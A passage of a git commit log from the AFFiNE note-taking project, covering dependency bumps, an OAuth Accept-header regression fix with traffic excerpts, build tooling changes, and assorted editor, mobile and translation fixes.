Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0600-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0590-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **deps:** lock file maintenance
([#&#8203;3261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3261))
([540926b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/540926bffe713c591163abaf56fbb0e18aaf5b88))

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-01 21:19:09 +00:00
GyeongSu Han 2e95d91093 fix: restore Accept header and prevent encoded response in GitHub OAuth token request (regression from #14061) (#14538)
## 📝 Summary

This PR fixes a regression that caused the following error during GitHub
OAuth login:

> Unable to parse JSON response from
[https://github.com/login/oauth/access_token](https://github.com/login/oauth/access_token)

Related issue:
[https://github.com/toeverything/AFFiNE/issues/14334](https://github.com/toeverything/AFFiNE/issues/14334)
Regression introduced in:
[https://github.com/toeverything/AFFiNE/pull/14061](https://github.com/toeverything/AFFiNE/pull/14061)

---

## 🎯 Background

GitHub’s OAuth access token endpoint returns different response formats
depending on the request headers.

To receive a JSON response, the request must include:

```
Accept: application/json
```

If the `Accept` header is missing, GitHub responds with:

```
application/x-www-form-urlencoded
```

The current implementation assumes a JSON response and parses it
directly.
When a non-JSON response is returned, JSON parsing fails,
breaking the OAuth login flow.

---

## 🔍 Traffic Analysis (tcpdump)

Network path:

affine-graphql → (HTTPS) → envoy → (HTTP, tcpdump) → envoy → GitHub

### Observed Request

```
POST /login/oauth/access_token HTTP/1.1
host: github-proxy.com
content-type: application/x-www-form-urlencoded
accept: */*
...
```

### Observed Response

```
HTTP/1.1 200 OK
date: Sat, 28 Feb 2026 14:47:43 GMT
content-type: application/x-www-form-urlencoded; charset=utf-8
...
```

The `Accept` header was `*/*` instead of `application/json`,
causing GitHub to return a form-urlencoded response.

---

## 🐛 Root Cause

PR #14061 introduced a side effect in the request configuration.

Although the `Accept` header was initially defined,
the request options were later overwritten by the `init` parameter.

Because `init.headers` replaced the previously defined headers object,
the required header was lost.

Resulting in:

* Missing `Accept: application/json`
* GitHub returning `application/x-www-form-urlencoded`
* JSON parsing failure
* OAuth login failure

---

## 🔧 Changes

### 1️⃣ Fix header overwrite order

* Process the incoming `init` parameter first
* Explicitly overwrite required headers afterward
* Ensure `Accept: application/json` is always enforced

---

## 💥 Breaking Changes

None.

---

## 🧪 How to Test

1. Configure GitHub OAuth.
2. Attempt login via GitHub.
3. Verify that:

   * The request contains `Accept: application/json`
   * The response content-type is `application/json`
   * No JSON parsing error occurs
   * OAuth login completes successfully

---

## 📌 Notes

This change restores correct OAuth behavior and prevents regression
caused by header overwriting introduced in #14061.

The same header overwrite pattern identified in this issue
was also found in the calendar module and has been corrected there as
well.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Improved backend HTTP header handling for external integrations to
avoid unintended header overrides, ensuring content-type and encoding
hints are applied consistently and improving reliability of service
requests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
2026-03-01 14:32:28 +00:00
DarkSky 2cb171f553 feat: cleanup webpack deps (#14530)
#### PR Dependency Tree


* **PR #14530** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
  * Webpack bundler support removed from the build system
* Bundler selection parameter removed from build and development
commands

* **Refactor**
  * Build configuration consolidated to a single bundler approach
* Webpack-specific build paths and workflows removed; development server
simplified

* **Chores**
  * Removed webpack-related dev dependencies and tooling
  * Updated package build scripts for a unified bundle command

* **Dependencies**
* Upgraded Sentry packages across frontend packages
(react/electron/esbuild plugin)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-28 00:24:08 +08:00
DarkSky a4e2242b8d chore: bump playwright (#13947)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated Playwright test tooling to 1.58.2 across the repository and
test packages.

* **Tests**
* Improved end-to-end robustness: replaced fragile timing/coordinate
logic with element-based interactions, added polling/retry checks for
flaky asserts and async state, and simplified input/rename flows to
reduce test flakiness.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 22:56:43 +08:00
DarkSky c90f173821 chore: bump deps (#14526)
#### PR Dependency Tree


* **PR #14526** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated Storybook component development tooling to version 10.2.13 for
improved stability and performance
  * Removed Chromatic integration from the component preview system

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 20:17:06 +08:00
DarkSky e1e0ac2345 chore: cleanup deps (#14525)
#### PR Dependency Tree


* **PR #14525** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Removed an unused development dependency.
* Updated dotLottie/Lottie-related dependency versions across packages
and replaced a removed player dependency with the new package.

* **Refactor**
* AI animated icons now re-export from a shared component and are loaded
only in the browser, reducing upfront bundle weight and centralizing
icon assets.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 11:56:54 +08:00
DarkSky bdccf4e9fd fix: typo 2026-02-27 10:20:35 +08:00
DarkSky 11cf1928b5 fix(server): transaction error (#14518)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Events can be dispatched in a detached context to avoid inheriting the
current transaction.

* **Bug Fixes**
* Improved resilience and error handling for event processing (graceful
handling of deleted workspaces and ignorable DB errors).
  * More reliable owner assignment flow when changing document owners.

* **Tests**
  * Added tests for doc content staleness with deleted workspaces.
  * Added permission event tests for missing workspace/editor scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-26 19:53:22 +08:00
donqu1xotevincent 5215c73166 chore(ios): update description (#14522) 2026-02-26 19:49:50 +08:00
DarkSky 895e774569 fix: static file handle & ws connect 2026-02-25 11:41:42 +08:00
DarkSky 79460072bb fix: old client compatibility 2026-02-24 23:58:10 +08:00
DarkSky 41b3b0e82e feat: handle calendar sync failed (#14510)
#### PR Dependency Tree


* **PR #14510** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved calendar sync reliability with exponential backoff for
repeated failures.
* Better handling of token refresh failures with automatic account
invalidation and cleanup when needed.
* Subscriptions are now automatically disabled and related events
removed when the calendar provider reports missing resources.

* **Tests**
* Added comprehensive tests covering sync failures, backoff behavior,
token refresh handling, skipping retries during backoff, and recovery.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-24 22:45:47 +08:00
DarkSky 9c99293c92 fix: linux release 2026-02-24 19:46:11 +08:00
DarkSky 6aba4350ac fix: deps link 2026-02-24 18:09:57 +08:00
DarkSky 046e126054 feat: bump typescript (#14507)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Upgraded TypeScript toolchain to v5.9.3 across packages and tooling.
* Removed legacy ts-node and migrated developer tooling to newer
runtimes (tsx/SWC) where applicable.
* **Documentation**
* Updated developer CLI docs and runtime behavior notes to reflect the
new loader/runtime for running TypeScript files; no changes to public
APIs or end-user behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-24 13:22:46 +08:00
DarkSky c2c7dde06c chore: bump deps (#14506)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Version bumped to 0.26.3 across the project and Helm charts.
  * Removed an unused dependency (minimatch) from multiple packages.
* Updated build/tooling and packaging metadata, including packaging
maker replacement.
  * Adjusted app release metadata and platform packaging config.

* **Tests**
* Updated test snapshots to reflect minor presentational styling
adjustments.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-24 09:11:41 +08:00
DarkSky 5fb1c11a96 fix: image proxy url (#14505)
#### PR Dependency Tree


* **PR #14505** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Improvements**
* Better image-proxy detection to avoid double-proxying already proxied
images.
* Improved runtime image proxy configuration so images load consistently
across deployments.
* More robust image URL handling for optimized image loading and fewer
redundant requests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-24 03:29:17 +08:00
passabilities.eth 3e39dbb298 fix(mobile): fixed toolbar position (#14329)
## Summary
Fixed the text formatting toolbar not working properly on mobile web
browsers.

## Problem
The toolbar had multiple issues on mobile devices:
- It would render off-screen or be covered by the virtual keyboard
- The flag-based rendering system caused visibility issues on mobile
- Long-press text selection didn't trigger the toolbar
- Wide toolbars could overflow the viewport

<img
src="https://github.com/user-attachments/assets/8f54590c-1d2c-4c87-abab-32206df17ebf"
width="250">

## Solution
- Use fixed positioning at bottom of screen on mobile devices
- Position toolbar above virtual keyboard using Visual Viewport API
- Handle toolbar visibility directly via `selectionchange` event
- Bypass flag-based rendering system on mobile to avoid rendering issues
- Add `touchend` listener to handle long-press text selection
- Limit toolbar max-width to viewport minus padding
- Enable horizontal scrolling for overflow content

<img
src="https://github.com/user-attachments/assets/45130860-f01a-45c1-87c5-d43264f88613"
width="250">

## Test plan
- [x] Tested on mobile Safari (iOS)
- [x] Tested on mobile Chrome (Android)
- [x] Verified desktop browsers still work correctly
- [x] Verified the toolbar is fixed to the bottom of the screen and
above virtual keyboard
- [x] Verified long-press text selection triggers toolbar

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Improvements**
* Mobile toolbar now anchors to the bottom, adapts width, and
repositions dynamically to stay above on-screen keyboards.
* Toolbar visibility is context-aware, showing when native-like text
selections occur and hiding otherwise; touch interactions are handled
for reliable toggling.
  * Desktop experience and public APIs remain unchanged.

<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-02-24 01:36:09 +08:00
DarkSky e617740974 chore: improve cors 2026-02-24 00:51:08 +08:00
DarkSky 744c78abbb feat(infra): improve ci perf (#14503)
#### PR Dependency Tree


* **PR #14503** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved CI efficiency with targeted Rust test detection and
workspace-scoped builds for faster, more focused runs.
* Added workflow static-analysis configuration and refined
Node/Playwright/Electron build flags and platform controls.
* Added a new test workspace dependency and TypeScript project reference
for blocksuite tests; updated workspace wiring for focused builds.
  * Cleaned CI environment handling for server test orchestration.

* **Bug Fixes**
* Hardened mobile release steps (safer credential handling and quoting)
to improve iOS/Android publish reliability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-23 21:52:17 +08:00
DarkSky 91c5869053 feat: improve selfhosted login (#14502)
fix #13397
fix #14011

#### PR Dependency Tree


* **PR #14502** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Centralized CORS policy with dynamic origin validation applied to
server and realtime connections
* Improved sign-in flows with contextual, localized error hints and
toast notifications
* Centralized network-error normalization and conditional OAuth provider
fetching

* **Bug Fixes**
* Better feedback for self-hosted connection failures and clearer
authentication error handling
* More robust handling of network-related failures with user-friendly
messages
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-23 21:23:01 +08:00
DarkSky 6d805b302c docs: cleanup outdated infos 2026-02-23 21:03:13 +08:00
Pixel Perfect fb9f49b948 fix(data-view): preserve filtering on hidden properties (#14500)
Fixes issue #14036 where hiding a column used in filters caused empty
table/kanban results.

Root cause: filter evaluation built the row map from visible properties
only.

Change: evaluate filters using full property set (propertiesRaw$) so
hidden filtered columns still participate.

Added unit regressions for both table and kanban hidden-column filtering
behavior.

Verified this does fix the filtering issue for hidden columns:

<img width="3440" height="1440" alt="Screenshot of before and after
views of a database with hidden columns and filtering on said column"
src="https://github.com/user-attachments/assets/c1e2674f-06be-44e9-97bd-63593172f05b"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Fixed filtering in Kanban and Table views so filters evaluate against
all properties (including hidden/raw columns), ensuring consistent
results regardless of column visibility.
* **Tests**
* Added tests covering filtering behavior with hidden and filtered
columns to prevent regressions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-23 20:45:12 +08:00
DarkSky ef6717e59a fix(editor): editor behavior and styles (#14498)
fix #14269 
fix #13920
fix #13977
fix #13953
fix #13895
fix #13905
fix #14136
fix #14357
fix #14491

#### PR Dependency Tree


* **PR #14498** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Callout and toolbar defaults now reliably show grey backgrounds
  * Keyboard shortcuts behave better across layouts and non-ASCII input
  * Deleted workspaces no longer appear in local listings

* **New Features**
  * Cell editing now respects pre-entry validation hooks
* Scrollbars use themeable variables and include Chromium compatibility
fixes

* **Style**
  * Minor UI color adjustment for hidden properties

* **Tests**
  * Added unit tests for table column handling and keymap behavior
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-23 06:37:16 +08:00
DarkSky ad988dbd1e chore: trim useless files for client (#14488)
#### PR Dependency Tree


* **PR #14488** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved Electron build to trim unused locale files on macOS, Windows,
and Linux while always preserving English fallbacks; added post-build
cleanup and stricter packaging ignore rules to exclude tests, examples,
scripts, docs, README, and build metadata.
* **Style**
  * Reformatted a TypeScript type annotation for consistency.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-22 17:17:42 +08:00
DarkSky 3d01766f55 fix: history may duplicate on concurrency (#14487)
#### PR Dependency Tree


* **PR #14487** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Enhanced history record creation to prevent duplicate entries in
concurrent scenarios.

* **Tests**
  * Added validation for idempotent history record creation.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-22 02:13:51 +08:00
DarkSky 2414aa5848 feat: improve admin build (#14485)
#### PR Dependency Tree


* **PR #14485** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Admin static assets now served under /admin for self-hosted installs
  * CLI is directly executable from the command line
  * Build tooling supports a configurable self-hosted public path
  * Updated admin package script for adding UI components
* Added a PostCSS dependency and plugin to the build toolchain for admin
builds

* **Style**
* Switched queue module to a local queuedash stylesheet, added queuedash
Tailwind layer, and scoped queuedash styles for the admin UI

* **Bug Fixes**
  * Improved error propagation in the Electron renderer
* Migration compatibility to repair a legacy checksum during native
storage upgrades

* **Tests**
  * Added tests covering the migration repair flow
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-21 23:25:05 +08:00
DarkSky 0de1bd0da8 feat: bump deps (#14484) 2026-02-21 08:04:18 +08:00
DarkSky 186ec5431d fix: android build 2026-02-21 05:12:12 +08:00
DarkSky da57bfe8e7 fix: enhance MCP token handling (#14483)
fix #14475 

#### PR Dependency Tree


* **PR #14483** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **New Features**
* Enhanced MCP server token management with improved security—tokens now
display only once with redaction support.
* Updated token creation and deletion workflows with clearer UI state
controls.
* Added tooltip guidance when copying configuration with redacted
tokens.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-21 04:14:14 +08:00
DarkSky c9bffc13b5 feat: improve mobile native impl (#14481)
fix #13529 

#### PR Dependency Tree


* **PR #14481** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mobile blob caching with file-backed storage for faster loads and
reduced network usage
* Blob decoding with lazy refresh on token-read failures for improved
reliability
  * Full-text search/indexing exposed to mobile apps
* Document sync APIs and peer clock management for robust cross-device
sync

* **Tests**
* Added unit tests covering payload decoding, cache safety, and
concurrency

* **Dependencies**
* Added an LRU cache dependency and a new mobile-shared package for
shared mobile logic
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-21 04:13:24 +08:00
DarkSky d8cc0acdd0 chore: update flags 2026-02-19 10:18:43 +08:00
Neo 35e1411407 fix: docTitle unexpectedly translated (#14467)
fix #14465

In Chinese mode, the document with the specified name may not be
displayed correctly in the sidebar, and it may be mistaken for the
translation of the content that needs to be translated.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed document title display in navigation panels on desktop and
mobile to properly render without additional processing steps.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-17 13:45:31 +00:00
DarkSky 8f833388eb feat: improve admin panel design (#14464) 2026-02-17 17:40:29 +08:00
DarkSky 850e646ab9 fix: electon rendering on windows (#14456)
fix #14450
fix #14401
fix #13983
fix #12766
fix #14404
fix #12019

#### PR Dependency Tree


* **PR #14456** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added new tab navigation functions: `switchTab`, `switchToNextTab`,
and `switchToPreviousTab`.

* **Bug Fixes**
  * Improved bounds validation for tab view resizing.
  * Enhanced tab lifecycle management during navigation events.
  * Refined background throttling behavior for active tabs.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-16 14:08:26 +08:00
DarkSky 728e02cab7 feat: bump eslint & oxlint (#14452)
#### PR Dependency Tree


* **PR #14452** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved null-safety, dependency tracking, upload validation, and
error logging for more reliable uploads, clipboard, calendar linking,
telemetry, PDF/theme printing, and preview/zoom behavior.
* Tightened handling of all-day calendar events (missing date now
reported).

* **Deprecations**
  * Removed deprecated RadioButton and RadioButtonGroup; use RadioGroup.

* **Chores**
* Unified and upgraded linting/config, reorganized imports, and
standardized binary handling for more consistent builds and tooling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-16 13:52:08 +08:00
DarkSky 792164edd1 fix: sign 2026-02-16 12:23:26 +08:00
DarkSky e3177e6837 feat: normalize search text (#14449)
#### PR Dependency Tree


* **PR #14449** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Improvements**
* Search text normalization now applied consistently across doc titles,
search results, and highlights for uniform display formatting.

* **Tests**
* Added comprehensive test coverage for search text normalization
utility.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-16 08:07:04 +08:00
DarkSky 42f2d2b337 feat: support markdown preview (#14447) 2026-02-15 21:05:52 +08:00
DarkSky 9d7f4acaf1 fix: s3 upload compatibility (#14445)
fix #14432 

#### PR Dependency Tree


* **PR #14445** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Improved file upload handling to ensure consistent support for
different data formats during object and multipart uploads.
* Enhanced type safety throughout storage and workflow components by
removing unnecessary type assertions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 19:16:36 +08:00
DarkSky 9a1f600fc9 chore: update i18n status 2026-02-15 14:59:52 +08:00
steffenrapp 0f906ad623 feat(i18n): update German translation (#14444)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Chat panel: session management, history loading, embedding progress,
and deletion flow
* Document analytics: views, unique visitors, guest metrics, charts,
viewers and paywall messaging
* Calendar integration: expanded account/provider states, errors and
flow copy; DOCX import tooltip
  * Appearance: image antialiasing option and window-behavior toggles
  * Workspace sharing: visibility controls and related tooltips

* **Improvements**
* Expanded error and empty-state wording, subscription/payment
description, and experimental feature labels
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 14:57:47 +08:00
DarkSky 09aa65c52a feat: improve ci 2026-02-15 14:53:35 +08:00
DarkSky 25227a09f7 feat: improve grouping perf in edgeless (#14442)
fix #14433 

#### PR Dependency Tree


* **PR #14442** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Level-of-detail thumbnails for large images.
  * Adaptive pacing for snapping, distribution and other alignment work.
  * RAF coalescer utility to batch high-frequency updates.
  * Operation timing utility to measure synchronous work.

* **Improvements**
* Batch group/ungroup reparenting that preserves element order and
selection.
  * Coalesced panning and drag updates to reduce jitter.
* Connector/group indexing for more reliable updates, deletions and
sync.
  * Throttled viewport refresh behavior.

* **Documentation**
  * Docs added for RAF coalescer and measureOperation.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 03:17:22 +08:00
DarkSky c0694c589b fix: editor style (#14440)
#### PR Dependency Tree


* **PR #14440** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Style**
* Refined CSS styling rules in workspace detail pages for improved
layout rendering consistency.
* Enhanced editor container display handling during loading states to
ensure proper layout adjustments.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 19:12:24 +08:00
DarkSky 819402d9f1 feat: asset upload with retry 2026-02-14 17:24:22 +08:00
DarkSky 33bc3e2fe9 feat: improve ci (#14438)
#### PR Dependency Tree


* **PR #14438** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Refined PR trigger automation to run only on open/reopen/synchronize
events
* Split native CI into platform-specific builds (Linux, Windows, macOS)
for more reliable pipelines
* Added conditional Copilot test gating to run API/E2E tests only when
relevant
* Added conditional PR-title lint skip when edits don't change the title
  * Improved test result uploads and artifact handling for gated flows
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 16:59:49 +08:00
DarkSky 2b71b3f345 feat: improve test & bundler (#14434)
#### PR Dependency Tree


* **PR #14434** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced rspack bundler as an alternative to webpack for optimized
builds.

* **Tests & Quality**
* Added comprehensive editor semantic tests covering markdown, hotkeys,
and slash-menu operations.
* Expanded CI cross-browser testing to Chromium, Firefox, and WebKit;
improved shape-rendering tests to account for zoom.

* **Bug Fixes**
  * Corrected CSS overlay styling for development servers.
  * Fixed TypeScript typings for build tooling.

* **Other**
  * Document duplication now produces consistent "(n)" suffixes.
  * French i18n completeness increased to 100%.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 16:09:09 +08:00
dcornuel-del 3bc28ba78c feat(i18n): update French translations for various keys (#14437)
ajout de definition

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Documentation**
* Enhanced French language support with improved grammar, gender
neutrality, and consistency across UI text.
  * Added French translations for new AI-powered features.
* Refined French phrasing in prompts, tooltips, and messages for better
clarity and natural language flow.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 14:43:22 +08:00
DarkSky 72df9cb457 feat: improve editor performance (#14429)
#### PR Dependency Tree


* **PR #14429** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* HTML import now splits lines on <br> into separate paragraphs while
preserving inline formatting.

* **Bug Fixes**
* Paste falls back to inserting after the first paragraph when no
explicit target is found.

* **Style**
  * Improved page-mode viewport styling for consistent content layout.

* **Tests**
* Added snapshot tests for <br>-based paragraph splitting; re-enabled an
e2e drag-page test.

* **Chores**
* Deferred/deduplicated font loading, inline text caching,
drag-handle/pointer optimizations, and safer inline render
synchronization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
